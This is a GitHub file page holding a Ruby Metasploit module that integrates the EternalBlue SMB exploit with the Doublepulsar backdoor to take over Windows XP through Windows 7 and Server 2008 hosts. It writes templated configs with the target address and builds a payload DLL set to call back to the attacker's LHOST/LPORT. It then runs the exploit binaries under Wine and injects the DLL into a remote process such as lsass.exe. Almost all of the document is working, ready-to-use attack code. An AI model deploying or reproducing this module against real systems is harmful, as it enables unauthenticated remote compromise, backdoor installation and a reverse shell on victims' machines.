Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Ablax LPORT customizable 50bb41b May 24, 2017
0 contributors

Users who have contributed to this file

executable file 132 lines (109 sloc) 5.14 KB
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
#include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'EternalBlue',
'Description' => %q{
This module exploits a vulnerability on SMBv1/SMBv2 protocols through Eternalblue.
After that, doublepulsar is used to inject remotely a malicious dll (it's will generate based on your payload selection).
You can use this module to compromise a host remotely (among the targets available) without needing nor authentication neither target's user interaction.
** THIS IS AN INTEGRATION OF THE ORIGINAL EXPLOIT, IT'S NOT THE FULL PORTATION **
},
'Author' =>
[
'Pablo Gonzalez (@pablogonzalezpe)',
'Sheila A. Berta (@UnaPibaGeek)'
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d",
},
'Platform' => 'win',
'DefaultTarget' => 8,
'Targets' =>
[
['Windows XP (all services pack) (x86) (x64)',{}],
['Windows Server 2003 SP0 (x86)',{}],
['Windows Server 2003 SP1/SP2 (x86)',{}],
['Windows Server 2003 (x64)',{}],
['Windows Vista (x86)',{}],
['Windows Vista (x64)',{}],
['Windows Server 2008 (x86) ',{}],
['Windows Server 2008 R2 (x86) (x64)',{}],
['Windows 7 (all services pack) (x86) (x64)',{}]
],
'Arch' => [ARCH_X86,ARCH_X64],
'ExitFunc' => 'thread',
'Target' => 0,
'License' => MSF_LICENSE,
)
)
register_options([
OptEnum.new('TARGETARCHITECTURE', [true,'Target Architecture','x86',['x86','x64']]),
OptString.new('ETERNALBLUEPATH',[true,'Path directory of Eternalblue','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
OptString.new('DOUBLEPULSARPATH',[true,'Path directory of Doublepulsar','/root/Eternalblue-Doublepulsar-Metasploit/deps/']),
OptString.new('WINEPATH',[true,'WINE drive_c path','/root/.wine/drive_c/']),
OptString.new('PROCESSINJECT',[true,'Name of process to inject into (Change to lsass.exe for x64)','wlms.exe'])
], self.class)
register_advanced_options([
OptInt.new('TimeOut',[false,'Timeout for blocking network calls (in seconds)',60]),
OptString.new('DLLName',[true,'DLL name for Doublepulsar','eternal11.dll'])
], self.class)
end
def exploit
#Custom XML Eternalblue
print_status('Generating Eternalblue XML data')
cp = `cp #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.Skeleton.xml #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
#WIN72K8R2 (4-8) and XP (0-3)
if target.name =~ /7|2008|Vista/
objective = "WIN72K8R2"
else
objective = "XP"
end
sed = `sed -i 's/%TARGET%/#{objective}/' #{datastore['ETERNALBLUEPATH']}/Eternalblue-2.2.0.xml`
#Custom XML Doublepulsar
print_status('Generating Doublepulsar XML data')
cp = `cp #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.Skeleton.xml #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%RHOST%/#{datastore['RHOST']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%RPORT%/#{datastore['RPORT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%TIMEOUT%/#{datastore['TIMEOUT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%TARGETARCHITECTURE%/#{datastore['TARGETARCHITECTURE']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
dllpayload = datastore['WINEPATH'] + datastore['DLLName']
dllpayload2 = dllpayload.gsub('/','\/')
sed = `sed -i 's/%DLLPAY%/#{dllpayload2}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
sed = `sed -i 's/%PROCESSINJECT%/#{datastore['PROCESSINJECT']}/' #{datastore['DOUBLEPULSARPATH']}/Doublepulsar-1.3.1.xml`
#Generate DLL
print_status("Generating payload DLL for Doublepulsar")
pay = framework.modules.create(datastore['payload'])
pay.datastore['LHOST'] = datastore['LHOST']
pay.datastore['LPORT'] = datastore['LPORT']
dll = pay.generate_simple({'Format'=>'dll'})
File.open(datastore['WINEPATH']+datastore['DLLName'],'w') do |f|
print_status("Writing DLL in #{dllpayload}")
f.print dll
end
#Send Exploit + Payload Injection
print_status('Launching Eternalblue...')
output = `cd #{datastore['ETERNALBLUEPATH']}; wine Eternalblue-2.2.0.exe`
if output =~ /=-=-WIN-=-=/
print_good("Pwned! Eternalblue success!")
elsif output =~ /Backdoor returned code: 10 - Success!/
print_good("Backdoor is already installed")
else
print_error("Are you sure it's vulnerable?")
end
print_status('Launching Doublepulsar...')
output2 = `cd #{datastore['DOUBLEPULSARPATH']}; wine Doublepulsar-1.3.1.exe`
if output2 =~ /Backdoor returned code: 10 - Success!/
print_good("Remote code executed... 3... 2... 1...")
else
print_error("Oops, something was wrong!")
end
handler
end
end
You can’t perform that action at this time.